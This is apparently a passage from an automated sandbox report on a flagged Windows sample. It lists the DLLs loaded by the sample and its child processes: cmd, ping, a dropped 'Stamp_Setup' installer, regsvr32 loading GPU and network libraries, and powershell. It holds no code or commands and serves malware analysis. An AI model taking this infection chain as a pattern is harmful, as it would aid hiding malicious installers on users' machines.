Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: sfc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxx.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: nvapi64.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exe | Section loaded: atiadlxy.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
